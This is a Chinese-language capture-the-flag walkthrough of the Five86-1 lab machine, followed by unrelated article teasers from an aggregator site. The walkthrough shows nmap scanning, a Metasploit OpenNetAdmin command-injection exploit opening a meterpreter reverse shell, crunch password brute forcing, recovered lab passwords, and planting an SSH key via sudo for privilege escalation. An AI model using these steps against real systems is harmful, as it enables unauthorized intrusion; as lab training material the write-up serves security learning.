Five86-1 靶机实战

Nmap:

1.存活探测:

nmap -sn 192.168.20.1/24

2.端口探测:

nmap -sS -p- 192.168.20.131

3.服务探测:

nmap -sVC -p 22,80,10000 -O --version-all 192.168.20.131

这里发现 10000 端口也是http服务。

服务漏扫:

nmap  -p 22,80,10000 --script=vuln 192.168.20.131
因为 前面我们探测 10000 端口是http服务,所以这里对 10000 的扫描结果是不对的。
我们看到 80 端口的有个 /robots.txt 君子协议。

Web打点:

访问 http://192.168.20.131 什么都没有,,看看君子协议。

发现目录,访问该目录:

http://192.168.20.131:10000/ 是有页面显示,告诉我们要 https 访问。

https://192.168.20.131:10000/

这里只能尝试爆破和sql注入均无果,,还是回到80端口尝试。

http://192.168.20.131/ona/

标题发现:OpenNetAdmin :: 0wn Your Network 这是一款 网络管理器。

exp->shell:

这里发现 msf 的命令注入利用脚本,和RCE远程命令执行脚本。

我们直接利用msf更快一点。

msf6 > search opennetadminMatching Modules
================#  Name                                                 Disclosure Date  Rank       Check  Description-  ----                                                 ---------------  ----       -----  -----------0  exploit/unix/webapp/opennetadmin_ping_cmd_injection  2019-11-19       excellent  Yes    OpenNetAdmin Ping Command InjectionInteract with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/opennetadmin_ping_cmd_injectionmsf6 > use 0
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set lhost 192.168.20.128
lhost => 192.168.20.128
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set rhost 192.168.20.131
rhost => 192.168.20.131
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > show options Module options (exploit/unix/webapp/opennetadmin_ping_cmd_injection):Name       Current Setting  Required  Description----       ---------------  --------  -----------Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]RHOSTS     192.168.20.131   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT      80               yes       The target port (TCP)SSL        false            no        Negotiate SSL/TLS for outgoing connectionsSSLCert                     no        Path to a custom SSL certificate (default is randomly generated)TARGETURI  /ona/login.php   yes       Base pathURIPATH                     no        The URI to use for this exploit (default is random)VHOST                       no        HTTP server virtual hostWhen CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:Name     Current Setting  Required  Description----     ---------------  --------  -----------SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.SRVPORT  8080             yes       The local port to listen on.Payload options (linux/x86/meterpreter/reverse_tcp):Name   Current Setting  Required  Description----   ---------------  --------  -----------LHOST  192.168.20.128   yes       The listen address (an interface may be specified)LPORT  4444             yes       The listen portExploit target:Id  Name--  ----0   Automatic TargetView the full module info with the info, or info -d command.msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > run[*] Started reverse TCP handler on 192.168.20.128:4444 
[*] Exploiting...
[*] Sending stage (1017704 bytes) to 192.168.20.131
[*] Meterpreter session 1 opened (192.168.20.128:4444 -> 192.168.20.131:32810) at 2024-04-16 14:48:04 +0800
[*] Command Stager progress - 100.00% done (706/706 bytes)meterpreter >

拿到shell,我们弹一个稳定的shell。

提权:

reports目录中,发现了 .htaccess 隐藏文件

告诉我们密码大概是10位数,字符均是 aefhrt 这几个字符里面的。

crunch生成密码:

爆破出来账密:

douglas/fatherrrrr

SSH:

直接ssh登录,这里是想办法登录更高权限的jen,我们这里发现了公钥,

我们将公钥拷贝进jen的用户目录下。

cp id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh
ssh jen@192.168.52.132

发现一封邮件,去看看。

可以看到moss用户的密码是Fire!Fire!

发现脚本文件,查看是乱码,,我们直接运行即可提权为root。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/623401.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Shell——执行方式详解

一.什么是shell Shell 是一个计算机程序,它提供了用户与操作系统内核之间的交互界面。它接受来自用户或其他程序的命令,并将其转换为操作系统能理解的形式,然后执行这些命令并将结果返回给用户或程序。 Shell 在操作系统中扮演着重要的角色…

Proxmox VE 实现批量增加多网络

前言 实现批量创建多网络,更改主机名称,hosts解析 初始化网卡,主机名称,hosts解析,重启网卡 我的主机六个网卡,使用的有四个网卡,以下一键创建和初始化主机名称我是以硬件的SN号最为主机的名…

[ C++ ] STL---map与set的使用指南

目录 关联式容器 键值对 set简介 set的常用接口 构造函数 set的迭代器 set的容量 修改相关接口 find()函数 insert()函数 erase()函数 clear()函数 count函数 lower_bound()函数 upper_bound()函数 multiset简介 map简介 map的常用接口 构造函数 map的迭代…

BK9524 BEKEN博通 无线麦克风接收芯片 提供配置工具软件

BK9524 系列 无线麦克风跳频芯片 24bit/48KHz 数字无线传输 2.5 毫秒的传输延迟 数字加密/绝无串音 无线空中对码/发射跳频/接收自动跟踪 免软件开发的 TURN-KEY 方案 接收芯片 BK9524 特点: 1. 接收灵敏度:-96 dBm(V 段); -94 dBm (…

《深入Linux内核架构》第2章 进程管理和调度 (6)

目录 2.8 调度器增强 2.8.1 SMP调度 2.8.2 调度域和控制组 2.8.3 内核抢占和低延迟相关工作 2.9 小结 本专栏文章将有70篇左右,欢迎关注,订阅后续文章。 2.8 调度器增强 2.8.1 SMP调度 进程迁移: 含义:把进程从一个CPU就绪队…

BCLinux8U6系统基线加固致无法su的问题分析

本文对BCLinux8U6系统进行基线加固致无法su的问题分析。 一、问题现象 对BCLinux8U6系统进行基线加固,su切换用户失败,报错信息如下: [ABCDlocalhost ~]$ su - 密码: su: 模块未知 二、问题分析 1、错误排查 出错前&#xf…

CubelMX点灯

工程配置 开发板led引脚图 工程io配置 配置PB5 为输出 配置 PE5 为输出 时钟配置 写测试代码 配置工程,下载运行。 参考链接 STM32入门教程-1.点灯_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1dC41147eL/?spm_id_from333.788&vd_sourcee821a225c7b…

为什么需要网络切片?

网络切片是电信领域的一个突破性概念,它允许将物理网络基础设施划分为多个虚拟网络,称为切片。每个切片作为一个独立的网络运行,拥有自己的专用资源和定制的特性,满足不同应用、行业或用户的特定需求。 将网络切片视为在共享物理…

Redis-键值设计

Redis-键值设计 1.设置key的规范 遵循基本格式:【业务名称】:【数据名】:【id】 可读性强,在客户端的情况下使用:如果前缀相同会分目录层级长度不超过44字节 string数据结构的三种类型,在44字节之内是embstring 内存…

栈的解释和实现

目录 1.栈的基本概念: 2. 栈的基本功能: 3.栈的实现: 3.1 存储结构:(顺序表) 3.2 初始化:(void StackInit(stack*tmp)) 3.3 栈的销毁:(void …

ObjectiveC-第一部分-基础入门-学习导航

专题地址:MacOS一站式程序开发系列专题 第一部分:基础入门学习导航 OSX-01-Mac OS应用开发概述:简单介绍下MacOS生态、Xcode使用以及使用Xcode创建app的方法OSX-02-Mac OS应用开发系列课程大纲和章节内容设计:介绍下此系列专题的文章内容组织形式以及此系列专题的覆盖内容…

Midjourney简明教程 - 合集

Midjourney简明教程(一):有关Midjourney的基本信息 AI绘画 绘画是人类一门很古老的艺术门类,人类通过实体的器具、画笔、颜色、颜料等反映客观世界和表达主观世界。 而AI绘画则是通过借助就计算机机器学习算法和模型来生成绘画…